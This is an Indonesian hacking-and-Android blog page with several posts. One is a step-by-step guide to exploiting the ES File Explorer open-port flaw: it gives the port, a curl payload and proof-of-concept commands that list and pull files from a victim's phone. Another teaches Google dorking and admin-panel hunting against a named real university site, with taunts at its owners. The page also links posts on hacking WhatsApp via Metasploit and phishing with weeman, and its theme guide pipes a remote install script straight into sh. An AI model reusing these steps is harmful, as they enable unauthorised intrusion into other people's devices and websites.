Tuesday, September 17, 2019

Manfaatkan 5 Aplikasi Android ini Untuk Berselancar di Internet Secara Tak Kasat Mata

Manfaatkan 5 Aplikasi Android ini Untuk Berselancar di Internet Secara Tak Kasat Mata

Privasi adalah hal yang wajib di lindungi oleh setiap orang, mau itu di dunia nyata maupun dunia maya (dumay).

Dan dalam hal berikut ini, mari kita berbicara dunia maya.

Di dunia maya, kalian bisa menjadi siapa saja, kapan saja, dan di mana saja.

Tapi, walaupun seperti itu, kalian tetap bisa telacak.

Karena hampir setiap website, memiliki kewenangan untuk melacak agan berdasarkan IP yang di gunakan di perakangkat android agan.

Maka dari itu, kita tentu perlu mencari cara, minimal menyembunyikan IP yang sedang kita gunakan.

Untungnya di android, semua di buat mudah.

Hanya dengan menggunakan aplikasi tambahan saja, IP kita sudah bisa di sembunyikan.

Untuk itu, di dalam artikel ini, saya ingin berbagi Aplikasi yang bisa kalian gunakan untuk berselancar di internet secara "Tak Kasat Mata".

Aplikasi yang saya bagikan, akan sepenuhnya gratis, dan beberapa akan memiliki fitur In-App Purchases.

Berikut 5 Aplikasi Android untuk Berselancar di Internet Secara Kasat Mata


1. Tor Browser

Manfaatkan 5 Aplikasi Android ini Untuk Berselancar di Internet Secara Tak Kasat Mata

Kategori : Browser.
Status : Gratis.
Fitur : Block Tracker, Resist Connection Hijack, Resist Fingerprint, Multi-Layer Finger Print.

Jika kalian ingin pergi ke tempat yang tidak bisa di kunjungi browser biasa, yaitu deepweb, maka kalian bisa menggunakan Tor Browser.

Tor Browser merupakan spesialis dalam meload situs-situs onion yang tidak bisa di lacak search engine biasa, serta aplikasi ini juga memiliki pengaya atau add-on.

Dengan add-on tersebut, agan bisa menambah fitur tor browser, misalnya dalam blocking track, ads, dan membersihkan cookies otomatis.

Dan aplikasi tor browser tetap bisa mengunjungi situs selain onion.
2. DuckduckGO

Manfaatkan 5 Aplikasi Android ini Untuk Berselancar di Internet Secara Tak Kasat Mata

Kategori :Browser
Status : Gratis
Fitur : Resist Ads Network, Encrypt Protection, Resist Tracking.

Jika kalian mencari search engine yang anti-tracking aktifitas kalian, saya akan sarankan duckduckgo.

Berbeda dengan google, duckduckgo privasi pengguna dengan tidak mentrack kalian dari aktifitas seperti search, dan ads traficking.

Dan yang saya suka dari duckduckgo ini adalah, tampilan hasil search yang bersih dan bebas iklan, sehingga kalian bisa mengklik apapun tanpa takut terkena "Trap" iklan.
3. Turbovpn

Manfaatkan 5 Aplikasi Android ini Untuk Berselancar di Internet Secara Tak Kasat Mata

Kategori : VPN
Status : Gratis
Fitur : High VPN Speed, No Login Needed, Unlimited Free VPN Client.

Jika ingin membuka situs yang terblokir oleh pemerintah tercintah, cara tercepat ada menggunakan VPN.

Dan jika ingin menggunakan vpn terbaik, saya sarankan gunakan turbo vpn.

VPN tersebut sudah cukup bagus dalam membuka situs-situs yang di blokir, serta untuk segi performa network juga tidak mudah down walaupun di versi yang gratis.

Walaupun kadang suka down, tapi bisa di atasi dengan mengganti region. Dan sedikit saran, untuk wilayah indonesia, hindari penggunaan negara singapura, karena sering down (tergantung sinyal).
4. ORBOT

Manfaatkan 5 Aplikasi Android ini Untuk Berselancar di Internet Secara Tak Kasat Mata

Kategori : VPN
Status : Gratis
Fitur : Free Proxy, Tor Encrypt, Selected App VPN

Cukup banyak aplikasi VPN yang tersedia di google playstore.

Dan kini, kita kedatangan orbot, salah satu cabang aplikasi dari Tor Browser.

Orbot dapat memberikan proxy yang dapat menyembunyikan IP kita, serta terdapat vpn mode yang memiliki fitur selected-app, di mana kita bisa menggunakan vpn di aplikasi tertentu saja.
5. Tunnel Bear VPN

Manfaatkan 5 Aplikasi Android ini Untuk Berselancar di Internet Secara Tak Kasat Mata

Kategori : VPN
Status : Gratis
Fitur : One Tap Connect, No Logging, Grizzy-Grade Security, Global VPN Network, Full Support

Tunnel Bear merupakan salah satu VPN terbaik alternatif TurboVPN.

Untuk dari performa network, aplikasi ini tidak kalah dengan TurboVPN. Tapi ada satu hal yang bikin saya jengkel, yaitu kita perlu login dulu untuk menggunakan VPN ini.

Berbeda dengan Turbo yang hanya kita buka, kemudian bisa langsung kita aktifkan VPNnya. Tapi tetap Tunnel Bear adalah vpn yang perlu kalian coba.

Monday, August 26, 2019

Android Termux Update #1 : Cara Penggunaan Instabot, dan Setting Terbaru

Hallo semua, apa kabarnya ? saya doakan agar selalu sehat ya :).

Pada postingan kali ini, kita akan membahas soal instabot.

Yap, tool yang sedang trending topik di grup Cuman Android ini, rupanya sedang mengalami trouble, yaitu

  • Masalah Update
  • Cara menjalankan Instabot 

Untuk itu, di sini saya akan membantu kalian untuk mengatasinya, dan mohon maaf, artikel ini tidak akan panjang, karena hanya di fokuskan ke masalah tersebut.

Jika kalian tidak tau apa itu instabot, kalian bisa baca asal-usulnya melalui link di bawah ini : 


Masalah 1 : Update Instabot 


Jika kalian mengikuti update di grup Cuman Android, tool tersebut telah mengalami update ke versi Instabot 0.6.0.

Dan jika kalian belum update, maka akan langsung kepental dari instabot.

Sebenarnya bisa tanpa perlu update, tapi lebih baik kita update saja ya.

Dan caranya itu seperti ini gan.

Masukan perintah di bawah ini  : 

python -m pip install neo-instabot --upgrade --no-cache-dir

Jika sudah selesai, maka instabot bisa kalian gunakan seperti biasa.

Hasil akhir :

Android Termux Update #1 : Cara Penggunaan Instabot, dan Setting Terbaru


Android Termux Update #1 : Cara Penggunaan Instabot, dan Setting Terbaru

Masalah 2 : Cara Menjalankan Instabot


Karena telah update ke versi 0.6.0, dan telah di fork ke neo, maka terjadi perubahan besar di versi ini.

Terutama di cara menggunakan/menjalankan Instabot.

Dan cara barunya seperti ini gan.

Masukan perintah di bawah ini  :

neo-instabot --dump > cumanandroid.yml

*ganti cumanandroid dengan nama yang kalian suka.

Dan untuk edit config file ymlnya, ketikan perintah ini : 

pkg install micro

micro cumanandroid.yml

kemudian masukan kode ini kedalam file tersebut, di baris paling atas

login: idagan
password: pwagan

Dan di lanjutkan dengan merubah nama kode instabot.config.yml menjadi nama file agan.

Lebih lengkapnya lihat gambar di bawah ini : 

Android Termux Update #1 : Cara Penggunaan Instabot, dan Setting Terbaru

Android Termux Update #1 : Cara Penggunaan Instabot, dan Setting Terbaru

Jika semua sudah selesai, maka save perubahan di file (ctrl + s & ctrl + q) tersebut.

Kemudian, bot tinggal di jalankan menggunakan program ini :

neo-instabot -c cumanandroid.yml -v

Hasil akhir : 

Android Termux Update #1 : Cara Penggunaan Instabot, dan Setting Terbaru

Tuesday, July 23, 2019

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Akhirnya sampai juga kita di part 15, tidak terasa sudah sejauh ini saya berbagi ilmu sama kalian, senangnya.

Dan karena saya tidak suka panjang lebar (pembaca setia cuman android pasti tau banget nih), mari kita langsung bahas materinya.

Beberapa waktu lalu saya sedang menggunakan termux + distro kali linux, untuk melakukan penstesting ke hape android, dan ketika sedang berjalan-jalan di github, saya menemukan tool untuk memanfaatkan bug di aplikasi ES File Explorer.

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Jadi bugnya ini adalah terdapat port yang terbuka, dan rupanya port tersebut sangat lah vulnerable, jadi tool ini memanfaatkan bug aplikasi tersebut untuk dapat melakukan pentesting atau menyusup ke dalam hape si korban.

Port yang terbuka :

angler:/ # netstat -ap | grep com.estrongs 
tcp6 0 0 :::59777 :::* LISTEN 5696/com.estrongs.android.pop

Payload yang di test :

curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777

Kemudian untuk cara memanfaatkan bugnya itu seperti ini :

Langkah 1 - Pertama download dulu aplikasi ES File Explorer (harus di bawah 4.1.9.7.4), silahkan pasang di hape agan atau di hape lain.

Download di sini

Langkah 2 - Buka termux, kemudian pasang kali linux melalui Anlinux.

Download aplikasi Anlinux melalui Google Playstore, kemudian ikuti tata caranya di situ.

Langkah 3 - Kalau sudah buka kali linux

./start-kali.sh

Langkah 4 - Jika sudah mari kita pasang dulu toolnya, ikuti perintah di bawah ini :

apt-get install python

apt-get install git

git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

cd ESFileExplorerOpenPortVuln

pip install -r requirements.txt

Langkah 5
- Kemudian untuk menggunakannya, agan buka dulu aplikasi ES File Managernya, kemudian baru bisa menggunakan perintah di bawah ini di dalam Termux kali-linux :

python poc.py --cmd PERINTAH/COMMANDS

contoh : python poc.py --cmd appPull


###################### # Available Commands # ######################

listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info
appPull: Pull an app from the device. Package name parameter is needed
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed

Hasil dari program python poc.py --cmd listFiles

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Hasil dari program python poc.py --cmd listVideos

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Gimana keren kan tutorialnya ?

Dan jika kalian ingin belajar lebih banyak seperti hal di atas, kalian bisa join ke grup telegram Cuman - Android, GRATIS : 

Link : 

Monday, July 8, 2019

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

"Google Hacking, also named Google Dorking, is a computer hacking technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites use."

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

Dorking merupakan teknik hacking yang memanfaatkan search engine (tidak hanya) google untuk menemukan celah, khususnya dalam website, dan ini sangat berbeda dengan teknik Search Engine Optimization yang di gunakan untuk meningkatkan rank.

Teknik ini adalah memanfaatkan google dork list, yaitu list yang di gunakan untuk mencari celah tersebut, dan contohnya itu seperti :
  • ?page=
  • ?id=
  • ?action=
  • .php?id=
  • .php?ID=
  • .php?pageID=
  • .php?file=
  • .php?content=
Dan jika di cari dork di atas menggunakan google search engine, maka hasilnya akan seperti berikut ini : 

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux
Dan dari sana, kita bisa mulai mencari link yang vulnerable.

Karena kita berada di lingkup android, tentu kita harus memanfaatkan penggunaan android sebaik mungkin, maka dari itu tutorial kali ini, akan kita lakukan di Termux - Android.

Jika kalian tidak tau apa itu termux, artikel ini bukan untuk kalian.

Dan saya sarankan, segera kunjungi artikel di bawah ini, untuk mengetahui penjelasan lebih lengkapnya :


Berikut : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux


Langkah 1 - Pertama, kita harus memasang package yang di butuhkan, yaitu lynx, dan curl, caranya seperti biasa, yaitu menggunakan pkg install

pkg install curl

&

pkg install lynx

Langkah 2 - Jika sudah, kemudian lanjutkan dengan mengirim package BinGoo ke dalam termux kita, menggunakan perintah git clone : 


Langkah 3 - Setelah selesai, maka akan muncul folder BinGoo, kemudian masuk ke dalam folder BinGoo, dan jalankan packagenya, dengan mengetikan perintah : 

./bingoo

Langkah 4 - Jika sudah terbuka, akan muncul 6 menu, dan di sini kita fokus dulu ke nomor 1, yaitu google.

Kita akan memanfaatkan dorking google, karena yang paling populer, dan selanjutnya agan bisa inputkan menu 1.

Kemudian, inputkan lagi menu 1 "Single Dork Scan"


Dan lanjutkan dengan pemilihan list dorking, di sini agan bisa menggunakan contoh yang sudah saya beri di atas.

Atau....

Bisa mengikuti saya menggunakan php, saya menggunakan php karena untuk mencegah terlalu banyak hasil.

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

Jika sudah, tungggu sampai selesai.

Langkah 5 - Nah, sebenarnya kita belum benar-benar selesai, kita perlu memilah lagi, dan caranya adalah dengan menginputkan kembali menu 2 "Google Link File : g-links.txt"

Perintah tersebut akan menunjukan kepada kita mana link yang "Possible" vulnerable, dan akan menghasilkan output link file g-links.txt ke dalam folder BinGoo.

Maka, nanti hasilnya akan seperti ini nih : 

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

Langkah 6 - Nah itu lah cara untuk dorking menggunakan tool BinGoo.

Terus apa yang harus di lakukan selanjutnya ?

Untuk selanjutnya, agan bisa melanjutkan dengan cek urlnya menggunakan sqlmap, atau mencari admin-panel.

Jika ingin menggunakan sqlmap, tapi gak tau caranya, saya sarankan baca tutorial cuman android tentang sqlmap di part ke-7 di sini :


Dan jika ingin tau cara mencari admin panel, seperti ini caranya : 

Langkah 1 - Inputkan menu 5 "Admin Page Finder"

Langkah 2 - Kemudian, inputkan url yang ingin di cari admin panel loginnya, bisa menggunakan link bebas, atau bisa menggunakan link hasil dork.

Di sini saya menggunakan link hasil dork, yaitu http://journals.itb.ac.id/ (sorry untuk menggunakan link anda, kalo gak mau di pake, tingkatin keamanannya, jangan salahkan kami, siapa suruh weak :p)

Langkah 3 - Jika sudah ketemu, hasilnya akan seperti ini nih gan : 

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

Nah dari situ, kalian pasti sudah tau apa yang harus di lakukan bukan ?

Masih kurang ilmunya ? kalo kurang, ayo belajar bareng saya, serta 2200 Opreker Android, dan pengguna Termux dari seluruh indonesia di grup Telegram.

Tenang aja, gratis : 

Tuesday, June 18, 2019

Cara Menggunakan Termux untuk Pemula, Part 13 : Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Bagi yang sudah mengikuti tutorial termux yang di sediakan cuman-android, pasti tau kalau saya tidak pernah memasang tema.

Dan sebenarnya, saya pakai tema, tapi karena ribet mengaturnya, akhirnya saya lepas deh.

Tapi karena beberapa waktu lalu ada pembaca cuman-android yang meminta untuk di buatkan tutorial pasang tema, jadi akhirnya saya buatkan.

Cara Menggunakan Termux untuk Pemula, Part 13 : Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Dan untuk memasang tema, tidak sesulit metasploit, ngrok, dan semacamnya, tapi harus tetap di simak dengan baik supaya tidak ada kesalahan.

Pada tutorial kali ini, kita akan menggunakan Termux Ohmyzsh sebagai tool untuk mengganti tema, dan font.

Kemudian, yang nanti agan akan butuhkan adalah ini :
  1. Termux
  2. Curl
  3. Micro (Text Editor), boleh juga nano.

Berikut, Tutorial Cara Mengganti Tema Menggunakan Termux-Ohmyzsh


1. Pertama, kita perlu pasang curl, maka ketikan perintah : 

pkg install curl

2. Kemudian, lanjutkan dengan memasang termux-ohmyzsh, maka ketikan perintah

sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)"


Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

3. Tunggu sampai proses pemasangan selesai, maka nanti agan langsung di suruh pilih tema yang agan mau, di sini saya pilih Dracula (nomor 6)

Inputkan nomor 6, kemudian enter

4. Setelah tema maka akan muncul font, pilih yang agan suka, di sini saya menggunakan arimo, maka saya inputkan nomor 1.

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

5. Setelah itu kalian bisa melihat perbedaannya.

Tampilan Error ? mari perbaiki.

6. Masukan perintah di bawah ini :

chcolor

Kemudian ganti dengan tema yang agan suka, karena saya suka permen karet, maka saya pilih peppermint (27).

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

7. Lalu untuk font, masukan perintah di bawah ini :

chfont

Kemudian ganti dengan font yang agan suka, karena web ini menggunakan roboto, maka di termux pun menggunakan roboto (10).


Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

8. Jika sudah maka tampilan akhirnya akan seperti ini :

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Gimana ? gampang bukan ?

Nah itu tadi untuk tema, dan untuk welcome screen begini caranya gan.

Tapi pertama, agan perlu memasang beberapa package, yaitu :
  1. micro (pkg install micro)
  2. ruby (pkg install ruby)
  3. cowsay (pkg install cowsay)
  4. toilet (pkg install toilet)
  5. neofetch (pkg install neofetch)
  6. lolcat (gem install lolcat)

Berikut, Tutorial Cara Memodifikasi Tema Welcome Screen di Termux


1. Untuk bisa mengganti welcome screen, kita perlu mengedit isi file zshrc yang ada di direktori usr/etc , dan caranya seperti ini.

Masukan perintah : 

cd ..

cd usr/etc

micro zshrc


Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Maka akan tampil isi zshrc, kemudian tempatkan kode di bawah ini ke dalam zshrc (seperti pada gambar) : 

clear
echo
echo
cowsay -f eyes Isi Pesan Selamat Datang | lolcat
echo
toilet -f future -F gay "Isi nama agan"
echo
neofetch
echo -e '\033[01;32m'
date
echo -e '\033[01;32m'

Kemudian untuk save, pencet CTRL + S (pada keyboard), dan untuk exit, pencet CTRL + Q (pada keyboard), kalau tidak ada ctrl, gunakan tombol volume bawah.

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Kemudian Exit dari termux, dengan cara ketikan perintah exit lalu enter.

Buka lagi termuxnya, maka tampilannya akan berubah seperti di bawah ini :

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Font untuk toilet (cukup ganti future dengan nama font yang ada di link tersebut) : https://github.com/cacalabs/toilet/tree/master/fonts

Resource : Upgun Tutorial
Part lanjutan untuk belajar termux :

#Part ke 2 :

- Cara Menggunakan Termux untuk Pemula, Part 2 : Pemasangan dan Penggunaan Package di Termux [Guide] - Tanpa Root  

#Part ke 3 :

Cara Menggunakan Termux untuk Pemula, Part 3 : Cara Mencari Kelemahan sebuah website hanya bermodalkan hp Android - Tanpa Root

#Part ke 4 :

Cara Menggunakan Termux untuk Pemula, Part 4 : Cara Memasang Hacking Toolbox, dan Menggunakannya (Lazymux) - Tanpa Root

#Part ke 5 :

- Cara Menggunakan Termux untuk Pemula, Part 5 : Nambang Crypto pake Termux - Tnapa Root

#Part ke 6 :

Cara Menggunakan Termux untuk Pemula, Part 6 : Membuat Script Sendiri  - Tanpa Root

#Part ke 7 :

- Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#Part ke 8 :

- Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

#Part ke 9 :

- Cara Menggunakan Termux untuk Menengah, Part 9 : Cara Terbaru Memasang package NGROK di Termux Android [TANPA ROOT]

#Part ke 10 :

- Cara Menggunakan Termux untuk Menengah, Part 10 : Seni menggunakan weeman untuk menjebak seseorang menggunakan Termux (Tanpa Root)

#Part ke 11 :

- Cara Menggunakan Termux untuk Menengah, Part 11 : Cara Paling Halal Mendapatkan Follower Instagram Melalui Termux Android [100% Gratis + Tanpa Root]

#Part ke 12 :

- Cara Menggunakan Termux untuk Expert , Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit 

#Part ke 13 : Belum Rilis